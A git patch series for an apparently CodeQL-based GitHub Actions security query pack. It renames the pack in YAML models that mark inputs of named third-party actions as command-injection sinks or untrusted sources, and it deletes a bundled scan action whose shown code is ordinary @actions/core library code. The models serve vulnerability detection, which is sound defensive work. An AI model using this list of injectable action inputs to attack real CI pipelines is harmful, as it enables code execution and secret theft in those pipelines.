["trilom/file-changes-action", "*", "output.files", "filename", "manual"] diff --git a/ql/lib/ext/tripss_conventional-changelog-action.model.yml b/ql/lib/ext/tripss_conventional-changelog-action.model.yml index 014e779b29a0..a534e3dfcf75 100644 --- a/ql/lib/ext/tripss_conventional-changelog-action.model.yml +++ b/ql/lib/ext/tripss_conventional-changelog-action.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["tripss/conventional-changelog-action", "*", "input.pre-release-identifier", "command-injection", "manual"] diff --git a/ql/lib/ext/tryghost_action-deploy-theme.model.yml b/ql/lib/ext/tryghost_action-deploy-theme.model.yml index 806c055529df..dfaa2e2687db 100644 --- a/ql/lib/ext/tryghost_action-deploy-theme.model.yml +++ b/ql/lib/ext/tryghost_action-deploy-theme.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["tryghost/action-deploy-theme", "*", "input.theme-name", "command-injection", "manual"] diff --git a/ql/lib/ext/tzkhan_pr-update-action.model.yml b/ql/lib/ext/tzkhan_pr-update-action.model.yml index d6e554a87092..f87beb15018c 100644 --- a/ql/lib/ext/tzkhan_pr-update-action.model.yml +++ b/ql/lib/ext/tzkhan_pr-update-action.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSourceModel data: - ["tzkhan/pr-update-action", "*", "output.headMatch", "branch", "manual"] diff --git a/ql/lib/ext/veracode_veracode-sca.model.yml b/ql/lib/ext/veracode_veracode-sca.model.yml index 55d1531a7707..59cc155b5507 100644 --- a/ql/lib/ext/veracode_veracode-sca.model.yml +++ b/ql/lib/ext/veracode_veracode-sca.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["veracode/veracode-sca", "*", "input.url", "command-injection", "manual"] diff --git a/ql/lib/ext/wearerequired_lint-action.model.yml b/ql/lib/ext/wearerequired_lint-action.model.yml index c52d62e204a4..52dcff39903b 100644 --- a/ql/lib/ext/wearerequired_lint-action.model.yml +++ b/ql/lib/ext/wearerequired_lint-action.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["wearerequired/lint-action", "*", "input.git_name", "command-injection", "manual"] diff --git a/ql/lib/ext/webfactory_ssh-agent.model.yml b/ql/lib/ext/webfactory_ssh-agent.model.yml index 1e915194d96e..f9e122c17a9c 100644 --- a/ql/lib/ext/webfactory_ssh-agent.model.yml +++ b/ql/lib/ext/webfactory_ssh-agent.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["webfactory/ssh-agent", "*", "input.ssh-agent-cmd", "command-injection", "manual"] diff --git a/ql/lib/ext/workflow-models/workflow-models.yml b/ql/lib/ext/workflow-models/workflow-models.yml index ff02589fb844..1f0401e8e616 100644 --- a/ql/lib/ext/workflow-models/workflow-models.yml +++ b/ql/lib/ext/workflow-models/workflow-models.yml @@ -1,14 +1,14 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: repositoryDataModel data: [] - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: workflowDataModel data: [] - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: contextTriggerDataModel data: - ["commit_comment", "github.event.comment"] @@ -55,7 +55,7 @@ extensions: - ["workflow_call", "github.event.workflow"] - ["workflow_call", "github.event.workflow_run"] - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: externallyTriggerableEventsDataModel data: - ["discussion"] diff --git a/ql/lib/ext/xt0rted_slash-command-action.model.yml b/ql/lib/ext/xt0rted_slash-command-action.model.yml index 1cc360c472d2..0910261d21d6 100644 --- a/ql/lib/ext/xt0rted_slash-command-action.model.yml +++ b/ql/lib/ext/xt0rted_slash-command-action.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSourceModel data: - ["xt0rted/slash-command-action", "*", "output.command-arguments", "text", "manual"] diff --git a/ql/lib/ext/zaproxy_action-baseline.model.yml b/ql/lib/ext/zaproxy_action-baseline.model.yml index cb7e0936cca1..91df4767a728 100644 --- a/ql/lib/ext/zaproxy_action-baseline.model.yml +++ b/ql/lib/ext/zaproxy_action-baseline.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["zaproxy/action-baseline", "*", "input.docker_name", "command-injection", "manual"] diff --git a/ql/lib/ext/zaproxy_action-full-scan.model.yml b/ql/lib/ext/zaproxy_action-full-scan.model.yml index 210c3365eda9..57f76c8cb4ab 100644 --- a/ql/lib/ext/zaproxy_action-full-scan.model.yml +++ b/ql/lib/ext/zaproxy_action-full-scan.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["zaproxy/action-full-scan", "*", "input.docker_name", "command-injection", "manual"] diff --git a/ql/lib/qlpack.yml b/ql/lib/qlpack.yml index 10d9eeddcf71..70edc1b05745 100644 --- a/ql/lib/qlpack.yml +++ b/ql/lib/qlpack.yml @@ -1,7 +1,7 @@ --- library: true warnOnImplicitThis: true -name: githubsecuritylab/actions-all +name: github/actions-all version: 0.1.2 dependencies: codeql/util: ^1.0.0 diff --git a/ql/src/qlpack.yml b/ql/src/qlpack.yml index 16bad7c15bd3..89df5ee87975 100644 --- a/ql/src/qlpack.yml +++ b/ql/src/qlpack.yml @@ -1,6 +1,6 @@ --- library: false -name: githubsecuritylab/actions-queries +name: github/actions-queries version: 0.1.2 groups: [actions, queries] suites: codeql-suites @@ -8,5 +8,5 @@ extractor: javascript dbscheme: semmlecode.javascript.dbscheme defaultSuiteFile: codeql-suites/actions-code-scanning.qls dependencies: - githubsecuritylab/actions-all: ${workspace} + github/actions-all: ${workspace} warnOnImplicitThis: true diff --git a/ql/test/qlpack.yml b/ql/test/qlpack.yml index 1676d742d37e..77e25d8e419c 100644 --- a/ql/test/qlpack.yml +++ b/ql/test/qlpack.yml @@ -1,9 +1,9 @@ --- -name: githubsecuritylab/actions-tests +name: github/actions-tests groups: [javascript, test] dependencies: - githubsecuritylab/actions-all: ${workspace} - githubsecuritylab/actions-queries: ${workspace} + github/actions-all: ${workspace} + github/actions-queries: ${workspace} extractor: javascript tests: . warnOnImplicitThis: true From 06918b0492705cd23477e966184ad59c7262477f Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Fri, 21 Jun 2024 09:19:37 +0200 Subject: [PATCH 342/707] Remove custom scan action --- .github/action/.gitignore | 1 - .github/action/dist/index.js | 30722 ----------------------- .github/action/dist/licenses.txt | 175 - .github/action/package-lock.json | 639 - .github/action/package.json | 48 - .github/action/src/codeql.ts | 172 - .github/action/src/index.ts | 61 - .github/action/tsconfig.json | 24 - .github/workflows/build.yml | 30 - .github/workflows/copy-to-bughalla.yml | 34 - action.yml | 51 - clean.sh | 2 - 12 files changed, 31959 deletions(-) delete mode 100644 .github/action/.gitignore delete mode 100644 .github/action/dist/index.js delete mode 100644 .github/action/dist/licenses.txt delete mode 100644 .github/action/package-lock.json delete mode 100644 .github/action/package.json delete mode 100644 .github/action/src/codeql.ts delete mode 100644 .github/action/src/index.ts delete mode 100644 .github/action/tsconfig.json delete mode 100644 .github/workflows/build.yml delete mode 100644 .github/workflows/copy-to-bughalla.yml delete mode 100644 action.yml delete mode 100755 clean.sh diff --git a/.github/action/.gitignore b/.github/action/.gitignore deleted file mode 100644 index c2658d7d1b31..000000000000 --- a/.github/action/.gitignore +++ /dev/null @@ -1 +0,0 @@ -node_modules/ diff --git a/.github/action/dist/index.js b/.github/action/dist/index.js deleted file mode 100644 index 7281eb9d9b51..000000000000 --- a/.github/action/dist/index.js +++ /dev/null @@ -1,30722 +0,0 @@ -/******/ (() => { // webpackBootstrap -/******/ var __webpack_modules__ = ({ - -/***/ 7351: -/***/ (function(__unused_webpack_module, exports, __nccwpck_require__) { - -"use strict"; - -var __createBinding = (this && this.__createBinding) || (Object.create ? (function(o, m, k, k2) { - if (k2 === undefined) k2 = k; - Object.defineProperty(o, k2, { enumerable: true, get: function() { return m[k]; } }); -}) : (function(o, m, k, k2) { - if (k2 === undefined) k2 = k; - o[k2] = m[k]; -})); -var __setModuleDefault = (this && this.__setModuleDefault) || (Object.create ? (function(o, v) { - Object.defineProperty(o, "default", { enumerable: true, value: v }); -}) : function(o, v) { - o["default"] = v; -}); -var __importStar = (this && this.__importStar) || function (mod) { - if (mod && mod.__esModule) return mod; - var result = {}; - if (mod != null) for (var k in mod) if (k !== "default" && Object.hasOwnProperty.call(mod, k)) __createBinding(result, mod, k); - __setModuleDefault(result, mod); - return result; -}; -Object.defineProperty(exports, "__esModule", ({ value: true })); -exports.issue = exports.issueCommand = void 0; -const os = __importStar(__nccwpck_require__(2037)); -const utils_1 = __nccwpck_require__(5278); -/** - * Commands - * - * Command Format: - * ::name key=value,key=value::message - * - * Examples: - * ::warning::This is the message - * ::set-env name=MY_VAR::some value - */ -function issueCommand(command, properties, message) { - const cmd = new Command(command, properties, message); - process.stdout.write(cmd.toString() + os.EOL); -} -exports.issueCommand = issueCommand; -function issue(name, message = '') { - issueCommand(name, {}, message); -} -exports.issue = issue; -const CMD_STRING = '::'; -class Command { - constructor(command, properties, message) { - if (!command) { - command = 'missing.command'; - } - this.command = command; - this.properties = properties; - this.message = message; - } - toString() { - let cmdStr = CMD_STRING + this.command; - if (this.properties && Object.keys(this.properties).length > 0) { - cmdStr += ' '; - let first = true; - for (const key in this.properties) { - if (this.properties.hasOwnProperty(key)) { - const val = this.properties[key]; - if (val) { - if (first) { - first = false; - } - else { - cmdStr += ','; - } - cmdStr += `${key}=${escapeProperty(val)}`; - } - } - } - } - cmdStr += `${CMD_STRING}${escapeData(this.message)}`; - return cmdStr; - } -} -function escapeData(s) { - return utils_1.toCommandValue(s) - .replace(/%/g, '%25') - .replace(/\r/g, '%0D') - .replace(/\n/g, '%0A'); -} -function escapeProperty(s) { - return utils_1.toCommandValue(s) - .replace(/%/g, '%25') - .replace(/\r/g, '%0D') - .replace(/\n/g, '%0A') - .replace(/:/g, '%3A') - .replace(/,/g, '%2C'); -} -//# sourceMappingURL=command.js.map - -/***/ }), - -/***/ 2186: -/***/ (function(__unused_webpack_module, exports, __nccwpck_require__) { - -"use strict"; - -var __createBinding = (this && this.__createBinding) || (Object.create ? (function(o, m, k, k2) { - if (k2 === undefined) k2 = k; - Object.defineProperty(o, k2, { enumerable: true, get: function() { return m[k]; } }); -}) : (function(o, m, k, k2) { - if (k2 === undefined) k2 = k; - o[k2] = m[k]; -})); -var __setModuleDefault = (this && this.__setModuleDefault) || (Object.create ? (function(o, v) { - Object.defineProperty(o, "default", { enumerable: true, value: v }); -}) : function(o, v) { - o["default"] = v; -}); -var __importStar = (this && this.__importStar) || function (mod) { - if (mod && mod.__esModule) return mod; - var result = {}; - if (mod != null) for (var k in mod) if (k !== "default" && Object.hasOwnProperty.call(mod, k)) __createBinding(result, mod, k); - __setModuleDefault(result, mod); - return result; -}; -var __awaiter = (this && this.__awaiter) || function (thisArg, _arguments, P, generator) { - function adopt(value) { return value instanceof P ? value : new P(function (resolve) { resolve(value); }); } - return new (P || (P = Promise))(function (resolve, reject) { - function fulfilled(value) { try { step(generator.next(value)); } catch (e) { reject(e); } } - function rejected(value) { try { step(generator["throw"](value)); } catch (e) { reject(e); } } - function step(result) { result.done ? resolve(result.value) : adopt(result.value).then(fulfilled, rejected); } - step((generator = generator.apply(thisArg, _arguments || [])).next()); - }); -}; -Object.defineProperty(exports, "__esModule", ({ value: true })); -exports.getIDToken = exports.getState = exports.saveState = exports.group = exports.endGroup = exports.startGroup = exports.info = exports.notice = exports.warning = exports.error = exports.debug = exports.isDebug = exports.setFailed = exports.setCommandEcho = exports.setOutput = exports.getBooleanInput = exports.getMultilineInput = exports.getInput = exports.addPath = exports.setSecret = exports.exportVariable = exports.ExitCode = void 0; -const command_1 = __nccwpck_require__(7351); -const file_command_1 = __nccwpck_require__(717); -const utils_1 = __nccwpck_require__(5278); -const os = __importStar(__nccwpck_require__(2037)); -const path = __importStar(__nccwpck_require__(1017)); -const oidc_utils_1 = __nccwpck_require__(8041); -/** - * The code to exit an action - */ -var ExitCode; -(function (ExitCode) { - /** - * A code indicating that the action was successful - */ - ExitCode[ExitCode["Success"] = 0] = "Success"; - /** - * A code indicating that the action was a failure - */ - ExitCode[ExitCode["Failure"] = 1] = "Failure"; -})(ExitCode = exports.ExitCode || (exports.ExitCode = {})); -//----------------------------------------------------------------------- -// Variables -//----------------------------------------------------------------------- -/** - * Sets env variable for this action and future actions in the job - * @param name the name of the variable to set - * @param val the value of the variable. Non-string values will be converted to a string via JSON.stringify - */ -// eslint-disable-next-line @typescript-eslint/no-explicit-any -function exportVariable(name, val) { - const convertedVal = utils_1.toCommandValue(val); - process.env[name] = convertedVal; - const filePath = process.env['GITHUB_ENV'] || ''; - if (filePath) { - return file_command_1.issueFileCommand('ENV', file_command_1.prepareKeyValueMessage(name, val)); - } - command_1.issueCommand('set-env', { name }, convertedVal); -} -exports.exportVariable = exportVariable; -/** - * Registers a secret which will get masked from logs - * @param secret value of the secret - */ -function setSecret(secret) { - command_1.issueCommand('add-mask', {}, secret); -} -exports.setSecret = setSecret; -/** - * Prepends inputPath to the PATH (for this action and future actions) - * @param inputPath - */ -function addPath(inputPath) { - const filePath = process.env['GITHUB_PATH'] || ''; - if (filePath) { - file_command_1.issueFileCommand('PATH', inputPath); - } - else { - command_1.issueCommand('add-path', {}, inputPath); - } - process.env['PATH'] = `${inputPath}${path.delimiter}${process.env['PATH']}`; -} -exports.addPath = addPath; -/** - * Gets the value of an input. - * Unless trimWhitespace is set to false in InputOptions, the value is also trimmed. - * Returns an empty string if the value is not defined. - * - * @param name name of the input to get - * @param options optional. See InputOptions. - * @returns string - */ -function getInput(name, options) { - const val = process.env[`INPUT_${name.replace(/ /g, '_').toUpperCase()}`] || ''; - if (options && options.required && !val) { - throw new Error(`Input required and not supplied: ${name}`); - } - if (options && options.trimWhitespace === false) { - return val; - } - return val.trim(); -} -exports.getInput = getInput; -/** - * Gets the values of an multiline input. Each value is also trimmed. - * - * @param name name of the input to get - * @param options optional. See InputOptions. - * @returns string[] - * - */ -function getMultilineInput(name, options) { - const inputs = getInput(name, options) - .split('\n') - .filter(x => x !== ''); - if (options && options.trimWhitespace === false) { - return inputs; - } - return inputs.map(input => input.trim()); -} -exports.getMultilineInput = getMultilineInput; -/** - * Gets the input value of the boolean type in the YAML 1.2 "core schema" specification. - * Support boolean input list: `true | True | TRUE | false | False | FALSE` . - * The return value is also in boolean type. - * ref: https://yaml.org/spec/1.2/spec.html#id2804923 - * - * @param name name of the input to get - * @param options optional. See InputOptions. - * @returns boolean - */ -function getBooleanInput(name, options) { - const trueValue = ['true', 'True', 'TRUE']; - const falseValue = ['false', 'False', 'FALSE']; - const val = getInput(name, options); - if (trueValue.includes(val)) - return true; - if (falseValue.includes(val)) - return false; - throw new TypeError(`Input does not meet YAML 1.2 "Core Schema" specification: ${name}\n` + - `Support boolean input list: \`true | True | TRUE | false | False | FALSE\``); -} -exports.getBooleanInput = getBooleanInput; -/** - * Sets the value of an output. - * - * @param name name of the output to set - * @param value value to store. Non-string values will be converted to a string via JSON.stringify - */ -// eslint-disable-next-line @typescript-eslint/no-explicit-any -function setOutput(name, value) { - const filePath = process.env['GITHUB_OUTPUT'] || ''; - if (filePath) { - return file_command_1.issueFileCommand('OUTPUT', file_command_1.prepareKeyValueMessage(name, value)); - } - process.stdout.write(os.EOL); - command_1.issueCommand('set-output', { name }, utils_1.toCommandValue(value)); -} -exports.setOutput = setOutput; -/** - * Enables or disables the echoing of commands into stdout for the rest of the step. - * Echoing is disabled by default if ACTIONS_STEP_DEBUG is not set. - * - */ -function setCommandEcho(enabled) { - command_1.issue('echo', enabled ? 'on' : 'off'); -} -exports.setCommandEcho = setCommandEcho; -//----------------------------------------------------------------------- -// Results -//----------------------------------------------------------------------- -/** - * Sets the action status to failed. - * When the action exits it will be with an exit code of 1 - * @param message add error issue message - */ -function setFailed(message) { - process.exitCode = ExitCode.Failure; - error(message); -} -exports.setFailed = setFailed; -//----------------------------------------------------------------------- -// Logging Commands -//----------------------------------------------------------------------- -/** - * Gets whether Actions Step Debug is on or not - */ -function isDebug() { - return process.env['RUNNER_DEBUG'] === '1'; -} -exports.isDebug = isDebug; -/** - * Writes debug message to user log - * @param message debug message - */ -function debug(message) { - command_1.issueCommand('debug', {}, message); -} -exports.debug = debug; -/** - * Adds an error issue - * @param message error issue message. Errors will be converted to string via toString() - * @param properties optional properties to add to the annotation. - */ -function error(message, properties = {}) { - command_1.issueCommand('error', utils_1.toCommandProperties(properties), message instanceof Error ? message.toString() : message); -} -exports.error = error; -/** - * Adds a warning issue - * @param message warning issue message. Errors will be converted to string via toString() - * @param properties optional properties to add to the annotation. - */ -function warning(message, properties = {}) { - command_1.issueCommand('warning', utils_1.toCommandProperties(properties), message instanceof Error ? message.toString() : message); -} -exports.warning = warning; -/** - * Adds a notice issue - * @param message notice issue message. Errors will be converted to string via toString() - * @param properties optional properties to add to the annotation. - */ -function notice(message, properties = {}) { - command_1.issueCommand('notice', utils_1.toCommandProperties(properties), message instanceof Error ? message.toString() : message); -} -exports.notice = notice; -/** - * Writes info to log with console.log. - * @param message info message - */ -function info(message) { - process.stdout.write(message + os.EOL); -} -exports.info = info; -/** - * Begin an output group. - * - * Output until the next `groupEnd` will be foldable in this group - * - * @param name The name of the output group - */ -function startGroup(name) { - command_1.issue('group', name); -} -exports.startGroup = startGroup; -/** - * End an output group. - */ -function endGroup() { - command_1.issue('endgroup'); -} -exports.endGroup = endGroup; -/** - * Wrap an asynchronous function call in a group. - * - * Returns the same type as the function itself. - * - * @param name The name of the group - * @param fn The function to wrap in the group - */ -function group(name, fn) { - return __awaiter(this, void 0, void 0, function* () { - startGroup(name); - let result; - try { - result = yield fn(); - } - finally { - endGroup(); - } - return result; - }); -} -exports.group = group; -//----------------------------------------------------------------------- -// Wrapper action state -//----------------------------------------------------------------------- -/** - * Saves state for current action, the state can only be retrieved by this action's post job execution. - * - * @param name name of the state to store - * @param value value to store. Non-string values will be converted to a string via JSON.stringify - */ -// eslint-disable-next-line @typescript-eslint/no-explicit-any -function saveState(name, value) { - const filePath = process.env['GITHUB_STATE'] || ''; - if (filePath) { - return file_command_1.issueFileCommand('STATE', file_command_1.prepareKeyValueMessage(name, value)); - } - command_1.issueCommand('save-state', { name }, utils_1.toCommandValue(value)); -} -exports.saveState = saveState; -/** - * Gets the value of an state set by this action's main execution. - * - * @param name name of the state to get - * @returns string - */ -function getState(name) { - return process.env[`STATE_${name}`] || ''; -} -exports.getState = getState; -function getIDToken(aud) { - return __awaiter(this, void 0, void 0, function* () { - return yield oidc_utils_1.OidcClient.getIDToken(aud); - }); -} -exports.getIDToken = getIDToken; -/** - * Summary exports - */ -var summary_1 = __nccwpck_require__(1327); -Object.defineProperty(exports, "summary", ({ enumerable: true, get: function () { return summary_1.summary; } })); -/** - * @deprecated use core.summary - */ -var summary_2 = __nccwpck_require__(1327); -Object.defineProperty(exports, "markdownSummary", ({ enumerable: true, get: function () { return summary_2.markdownSummary; } })); -/** - * Path exports - */ -var path_utils_1 = __nccwpck_require__(2981); -Object.defineProperty(exports, "toPosixPath", ({ enumerable: true, get: function () { return path_utils_1.toPosixPath; } })); -Object.defineProperty(exports, "toWin32Path", ({ enumerable: true, get: function () { return path_utils_1.toWin32Path; } })); -Object.defineProperty(exports, "toPlatformPath", ({ enumerable: true, get: function () { return path_utils_1.toPlatformPath; } })); -//# sourceMappingURL=core.js.map - -/***/ }), - -/***/ 717: -/***/ (function(__unused_webpack_module, exports, __nccwpck_require__) { - -"use strict"; - -// For internal use, subject to change. -var __createBinding = (this && this.__createBinding) || (Object.create ? (function(o, m, k, k2) { - if (k2 === undefined) k2 = k; - Object.defineProperty(o, k2, { enumerable: true, get: function() { return m[k]; } }); -}) : (function(o, m, k, k2) { - if (k2 === undefined) k2 = k; - o[k2] = m[k]; -})); -var __setModuleDefault = (this && this.__setModuleDefault) || (Object.create ? (function(o, v) { - Object.defineProperty(o, "default", { enumerable: true, value: v }); -}) : function(o, v) { - o["default"] = v; -}); -var __importStar = (this && this.__importStar) || function (mod) { - if (mod && mod.__esModule) return mod; - var result = {}; - if (mod != null) for (var k in mod) if (k !== "default" && Object.hasOwnProperty.call(mod, k)) __createBinding(result, mod, k); - __setModuleDefault(result, mod); - return result; -}; -Object.defineProperty(exports, "__esModule", ({ value: true })); -exports.prepareKeyValueMessage = exports.issueFileCommand = void 0; -// We use any as a valid input type -/* eslint-disable @typescript-eslint/no-explicit-any */ -const fs = __importStar(__nccwpck_require__(7147)); -const os = __importStar(__nccwpck_require__(2037)); -const uuid_1 = __nccwpck_require__(5840); -const utils_1 = __nccwpck_require__(5278); -function issueFileCommand(command, message) { - const filePath = process.env[`GITHUB_${command}`]; - if (!filePath) { - throw new Error(`Unable to find environment variable for file command ${command}`); - } - if (!fs.existsSync(filePath)) { - throw new Error(`Missing file at path: ${filePath}`); - } - fs.appendFileSync(filePath, `${utils_1.toCommandValue(message)}${os.EOL}`, { - encoding: 'utf8' - }); -} -exports.issueFileCommand = issueFileCommand; -function prepareKeyValueMessage(key, value) { - const delimiter = `ghadelimiter_${uuid_1.v4()}`; - const convertedValue = utils_1.toCommandValue(value); - // These should realistically never happen, but just in case someone finds a - // way to exploit uuid generation let's not allow keys or values that contain - // the delimiter. - if (key.includes(delimiter)) { - throw new Error(`Unexpected input: name should not contain the delimiter "${delimiter}"`); - } - if (convertedValue.includes(delimiter)) { - throw new Error(`Unexpected input: value should not contain the delimiter "${delimiter}"`); - } - return `${key}<<${delimiter}${os.EOL}${convertedValue}${os.EOL}${delimiter}`; -} -exports.prepareKeyValueMessage = prepareKeyValueMessage; -//# sourceMappingURL=file-command.js.map - -/***/ }), - -/***/ 8041: -/***/ (function(__unused_webpack_module, exports, __nccwpck_require__) { - -"use strict"; - -var __awaiter = (this && this.__awaiter) || function (thisArg, _arguments, P, generator) { - function adopt(value) { return value instanceof P ? value : new P(function (resolve) { resolve(value); }); } - return new (P || (P = Promise))(function (resolve, reject) { - function fulfilled(value) { try { step(generator.next(value)); } catch (e) { reject(e); } } - function rejected(value) { try { step(generator["throw"](value)); } catch (e) { reject(e); } } - function step(result) { result.done ? resolve(result.value) : adopt(result.value).then(fulfilled, rejected); } - step((generator = generator.apply(thisArg, _arguments || [])).next()); - }); -}; -Object.defineProperty(exports, "__esModule", ({ value: true })); -exports.OidcClient = void 0; -const http_client_1 = __nccwpck_require__(6255); -const auth_1 = __nccwpck_require__(5526); -const core_1 = __nccwpck_require__(2186); -class OidcClient { - static createHttpClient(allowRetry = true, maxRetry = 10) { - const requestOptions = { - allowRetries: allowRetry, - maxRetries: maxRetry - }; - return new http_client_1.HttpClient('actions/oidc-client', [new auth_1.BearerCredentialHandler(OidcClient.getRequestToken())], requestOptions); - } - static getRequestToken() { - const token = process.env['ACTIONS_ID_TOKEN_REQUEST_TOKEN']; - if (!token) { - throw new Error('Unable to get ACTIONS_ID_TOKEN_REQUEST_TOKEN env variable'); - } - return token; - } - static getIDTokenUrl() { - const runtimeUrl = process.env['ACTIONS_ID_TOKEN_REQUEST_URL']; - if (!runtimeUrl) { - throw new Error('Unable to get ACTIONS_ID_TOKEN_REQUEST_URL env variable'); - } - return runtimeUrl; - } - static getCall(id_token_url) { - var _a; - return __awaiter(this, void 0, void 0, function* () { - const httpclient = OidcClient.createHttpClient(); - const res = yield httpclient - .getJson(id_token_url) - .catch(error => { - throw new Error(`Failed to get ID Token. \n - Error Code : ${error.statusCode}\n - Error Message: ${error.message}`); - }); - const id_token = (_a = res.result) === null || _a === void 0 ? void 0 : _a.value; - if (!id_token) { - throw new Error('Response json body do not have ID Token field'); - } - return id_token; - }); - } - static getIDToken(audience) { - return __awaiter(this, void 0, void 0, function* () { - try { - // New ID Token is requested from action service - let id_token_url = OidcClient.getIDTokenUrl(); - if (audience) { - const encodedAudience = encodeURIComponent(audience); - id_token_url = `${id_token_url}&audience=${encodedAudience}`; - } - core_1.debug(`ID token url is ${id_token_url}`); - const id_token = yield OidcClient.getCall(id_token_url); - core_1.setSecret(id_token); - return id_token; - } - catch (error) { - throw new Error(`Error message: ${error.message}`); - } - }); - } -} -exports.OidcClient = OidcClient; -//# sourceMappingURL=oidc-utils.js.map - -/***/ }), - -/***/ 2981: -/***/ (function(__unused_webpack_module, exports, __nccwpck_require__) { - -"use strict"; - -var __createBinding = (this && this.__createBinding) || (Object.create ? (function(o, m, k, k2) { - if (k2 === undefined) k2 = k; - Object.defineProperty(o, k2, { enumerable: true, get: function() { return m[k]; } }); -}) : (function(o, m, k, k2) { - if (k2 === undefined) k2 = k; - o[k2] = m[k]; -})); -var __setModuleDefault = (this && this.__setModuleDefault) || (Object.create ? (function(o, v) { - Object.defineProperty(o, "default", { enumerable: true, value: v }); -}) : function(o, v) { - o["default"] = v; -}); -var __importStar = (this && this.__importStar) || function (mod) { - if (mod && mod.__esModule) return mod; - var result = {}; - if (mod != null) for (var k in mod) if (k !== "default" && Object.hasOwnProperty.call(mod, k)) __createBinding(result, mod, k); - __setModuleDefault(result, mod); - return result; -}; -Object.defineProperty(exports, "__esModule", ({ value: true })); -exports.toPlatformPath = exports.toWin32Path = exports.toPosixPath = void 0; -const path = __importStar(__nccwpck_require__(1017)); -/** - * toPosixPath converts the given path to the posix form. On Windows, \\ will be - * replaced with /. - * - * @param pth. Path to transform. - * @return string Posix path. - */ -function toPosixPath(pth) { - return pth.replace(/[\\]/g, '/'); -} -exports.toPosixPath = toPosixPath; -/** - * toWin32Path converts the given path to the win32 form. On Linux, / will be - * replaced with \\. - * - * @param pth. Path to transform. - * @return string Win32 path. - */ -function toWin32Path(pth) { - return pth.replace(/[/]/g, '\\'); -} -exports.toWin32Path = toWin32Path; -/** - * toPlatformPath converts the given path to a platform-specific path. It does - * this by replacing instances of / and \ with the platform-specific path - * separator. - * - * @param pth The path to platformize. - * @return string The platform-specific path. - */ -function toPlatformPath(pth) { - return pth.replace(/[/\\]/g, path.sep); -} -exports.toPlatformPath = toPlatformPath; -//# sourceMappingURL=path-utils.js.map - -/***/ }), - -/***/ 1327: -/***/ (function(__unused_webpack_module, exports, __nccwpck_require__) { - -"use strict"; - -var __awaiter = (this && this.__awaiter) || function (thisArg, _arguments, P, generator) { - function adopt(value) { return value instanceof P ? value : new P(function (resolve) { resolve(value); }); } - return new (P || (P = Promise))(function (resolve, reject) { - function fulfilled(value) { try { step(generator.next(value)); } catch (e) { reject(e); } } - function rejected(value) { try { step(generator["throw"](value)); } catch (e) { reject(e); } } - function step(result) { result.done ? resolve(result.value) : adopt(result.value).then(fulfilled, rejected); } - step((generator = generator.apply(thisArg, _arguments || [])).next()); - }); -}; -Object.defineProperty(exports, "__esModule", ({ value: true })); -exports.summary = exports.markdownSummary = exports.SUMMARY_DOCS_URL = exports.SUMMARY_ENV_VAR = void 0; -const os_1 = __nccwpck_require__(2037); -const fs_1 = __nccwpck_require__(7147); -const { access, appendFile, writeFile } = fs_1.promises; -exports.SUMMARY_ENV_VAR = 'GITHUB_STEP_SUMMARY'; -exports.SUMMARY_DOCS_URL = 'https://docs.github.com/actions/using-workflows/workflow-commands-for-github-actions#adding-a-job-summary'; -class Summary { - constructor() { - this._buffer = ''; - } - /** - * Finds the summary file path from the environment, rejects if env var is not found or file does not exist - * Also checks r/w permissions. - * - * @returns step summary file path - */ - filePath() { - return __awaiter(this, void 0, void 0, function* () { - if (this._filePath) { - return this._filePath; - } - const pathFromEnv = process.env[exports.SUMMARY_ENV_VAR]; - if (!pathFromEnv) { - throw new Error(`Unable to find environment variable for $${exports.SUMMARY_ENV_VAR}. Check if your runtime environment supports job summaries.`); - } - try { - yield access(pathFromEnv, fs_1.constants.R_OK | fs_1.constants.W_OK); - } - catch (_a) { - throw new Error(`Unable to access summary file: '${pathFromEnv}'. Check if the file has correct read/write permissions.`); - } - this._filePath = pathFromEnv; - return this._filePath; - }); - } - /** - * Wraps content in an HTML tag, adding any HTML attributes - * - * @param {string} tag HTML tag to wrap - * @param {string | null} content content within the tag - * @param {[attribute: string]: string} attrs key-value list of HTML attributes to add - * - * @returns {string} content wrapped in HTML element - */ - wrap(tag, content, attrs = {}) { - const htmlAttrs = Object.entries(attrs) - .map(([key, value]) => ` ${key}="${value}"`) - .join(''); - if (!content) { - return `<${tag}${htmlAttrs}>`; - } - return `<${tag}${htmlAttrs}>${content}`; - } - /** - * Writes text in the buffer to the summary buffer file and empties buffer. Will append by default. - * - * @param {SummaryWriteOptions} [options] (optional) options for write operation - * - * @returns {Promise

